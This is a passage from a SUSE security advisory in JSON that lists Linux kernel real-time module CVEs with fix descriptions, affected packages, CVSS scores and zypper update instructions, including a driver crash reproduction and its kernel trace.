"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
